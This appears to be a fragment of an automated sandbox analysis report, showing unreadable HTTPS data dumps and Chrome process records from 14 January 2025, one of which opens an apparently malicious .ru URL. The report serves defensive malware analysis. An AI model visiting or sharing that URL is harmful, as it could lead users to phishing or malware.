                      2025-01-14 17:01:02 UTC1369INData Raw: 04 97 dc 23 ce da ee 0c 71 7c 08 57 8d ea c8 88 bd 38 c4 ab 72 aa cb 0c fb 1e f0 88 df 96 27 d4 2e e7 3e 09 ef da 6d 5e 68 dd 97 44 6e 43 0f a5 78 d8 96 b5 7b ed aa 8c 7f e4 51 c6 00 0f 60 c1 ab c9 f1 98 4f ea a7 e8 4d f6 f5 d1 7c 62 ca 0a fc 0d 53 7d cb c3 7b dd f7 68 49 ff 85 02 73 71 4d 76 17 21 a3 86 a8 c6 37 e4 ed 11 d7 30 1a dc bb f3 fb 6d b2 87 d4 d3 0d d8 9f 7d 83 8d 79 ea b0 1b 25 33 e4 7b fa e5 af 56 ab 75 a8 35 93 b5 b7 5d e2 33 4c 87 6e e5 67 65 de e5 2c 2a 01 0a 35 31 09 c2 2c e6 1f 2c 01 80 80 f7 08 80 b2 cc e0 7e 77 27 a7 77 56 10 8e 4d 8e e1 56 96 36 3c 86 bd c7 21 1b 56 94 18 50 3c 3e 76 a1 48 f5 78 9a 48 c6 49 95 18 b3 02 fb f2 57 33 78 50 c2 99 b1 77 d7 f1 3a ec 36 3c d4 45 ad 47 44 4d 8d 38 25 cf 28 f3 ed cd 9a 3a bf 60 6f 77 99 d6 9e
                      Data Ascii: #q|W8r'.>m^hDnCx{Q`OM|bS}{hIsqMv!70m}y%3{Vu5]3Lnge,*51,,~w'wVMV6<!VP<>vHxHIW3xPw:6<EGDM8%(:`ow
                      2025-01-14 17:01:02 UTC1369INData Raw: 07 b2 30 78 3f 7a 8d 7b 0c da 26 3e ef a9 95 c6 8e 9a 2e cd cf a4 79 0d 6b 57 ba 17 bc 2f 06 88 c8 9d c1 91 85 5c 14 90 05 e8 4b 2d be 2d 68 ce 6a 69 07 ed 67 2e ac 4c 6b b7 da 39 0e af 7c a1 f8 97 bf d9 a4 2b 79 f2 8d 67 76 2c 58 00 da 2f d6 f8 ad c7 74 4e 6b fe 79 6b 8b 44 7b d2 51 a5 44 de 8c 40 99 78 61 72 a9 a2 eb 38 c3 e9 80 b6 9b f5 68 43 3f 21 07 82 c9 af 05 90 33 19 e3 8d 50 dc 70 42 08 89 e2 9d a0 af 9e c3 7c 78 e1 8a 36 4f 8d 25 6b ee e6 68 8e 34 fa 23 22 83 fd 2c 1e 5c d2 86 bc c4 26 e3 31 1c 16 12 07 a0 e4 b7 dc cd ca 11 90 61 73 3f c1 c3 f4 fb eb ff b8 b7 6f 53 f4 66 10 cb 36 07 b8 31 e4 5c 7d cd 6e 0d 2e 03 1e 6b 76 01 6e 64 9e 19 5f 2b 8a c7 7f 4a e7 de a4 4b b9 48 35 10 af 3a e7 9d cf e5 32 30 48 17 6d b4 02 38 b3 d2 a7 8c 81 fb bc 0f 5c
                      Data Ascii: 0x?z{&>.ykW/\K--hjig.Lk9|+ygv,X/tNkykD{QD@xar8hC?!3PpB|x6O%kh4#",\&1as?oSf61\}n.kvnd_+JKH5:20Hm8\
                      2025-01-14 17:01:02 UTC1369INData Raw: 53 e6 91 aa 1d fc 59 93 83 3b 61 bd b7 81 8b b1 4b 7a ed da fa 6a 69 c5 23 e8 fe 62 bd 24 ba 78 a0 60 ca 10 d3 fa b6 47 4c 3b 16 02 fc f2 ee 54 cd cd 3a d2 c3 77 58 cd 84 29 d2 d6 63 62 eb 18 6d 2a f0 70 0c b7 c7 24 5e 1c 1e d9 29 90 41 df b6 e5 78 d2 0d e9 f3 10 cd 0a df 2f 31 da 65 e7 bd 38 b9 e6 54 94 76 6a 08 d7 cf 50 98 6d 43 50 d6 1c 2c e6 67 06 88 27 92 34 0b 69 c4 db 27 a5 9d 52 bb 30 76 aa 46 e0 05 c2 c0 99 4a 6e 7a 92 b9 fc 8b e3 1a 28 0b b2 7c 05 17 4a e9 08 a1 e9 ad 3b 19 6e 68 4d 05 7f 88 72 ef 28 b1 73 7f ca d9 57 ba 2e 09 82 aa 16 6f c7 56 1e 04 39 ef 8b 1d 41 2c 1a f6 2c f5 73 5c 1a 2b 4a fe 11 fa 94 16 e7 8d c4 09 1f 78 b0 bd 44 fb 4a 87 9b 72 e0 76 52 45 cb 40 63 84 0c 30 ef 11 e1 f2 32 30 70 18 de c1 0a ba b4 40 91 37 b0 94 60 41 be da
                      Data Ascii: SY;aKzji#b$x`GL;T:wX)cbm*p$^)Ax/1e8TvjPmCP,g'4i'R0vFJnz(|J;nhMr(sW.oV9A,,s\+JxDJrvRE@c020p@7`A
                      2025-01-14 17:01:02 UTC1369INData Raw: c2 21 71 94 dc be 4d 53 7c b0 32 f9 69 c6 ce d0 3e e5 1a 8e 65 b0 18 9c fc 23 bc b8 2f 2a 1c b5 2d cd 48 70 b6 82 42 8b a9 d0 fa 9c 28 30 55 5e 9d ad a9 b2 11 b4 0e 83 67 98 0b c5 f0 6a db 02 84 c4 d8 7d 6a 35 b6 75 c3 87 ba 21 9e 92 70 12 10 25 3b de 39 bc d5 a3 84 b5 21 d0 89 e7 59 a4 57 be ae ef 8f 22 c6 4f 87 84 b7 a2 2c e5 9d 6a 32 4b 61 da c8 4b 32 b5 15 04 67 c8 c6 3a ec e6 d7 d3 8a b2 96 25 b2 75 85 a6 c3 2f cb fe a9 ec 3f 3d 84 f5 ff f4 fb 77 31 cf 99 24 2e 1a 02 85 76 b0 b9 0c 94 74 fa 59 66 f1 1c 86 e7 8a a9 db 34 20 03 ab 20 fe 53 60 90 c5 f3 e3 5b 19 3e 1a ba 37 24 b9 06 0c d0 5b fe 9b 9c 53 c8 2c 29 c1 21 1c ed b2 7d 36 46 df ff ad ec fa 34 e3 55 b3 ea 46 e1 6e 8e 89 3d c5 d7 79 e6 4e 61 5b e5 22 13 e6 89 6d 72 bd 61 97 86 8a c8 d1 3b 68 fb
                      Data Ascii: !qMS|2i>e#/*-HpB(0U^gj}j5u!p%;9!YW"O,j2KaK2g:%u/?=w1$.vtYf4 S`[>7$[S,)!}6F4UFn=yNa["mra;h


                      Click to jump to process

                      Click to jump to process

                      Click to jump to process

                      Target ID:0
                      Start time:12:00:33
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                      Imagebase:0x7ff715980000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:2
                      Start time:12:00:37
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2028,i,6066917806867256690,5191470454520669849,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                      Imagebase:0x7ff715980000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:false

                      Target ID:3
                      Start time:12:00:42
                      Start date:14/01/2025
                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://xucr.vafdcekgwp.ru/aIDt6/"
                      Imagebase:0x7ff715980000
                      File size:3'242'272 bytes
                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      No disassembly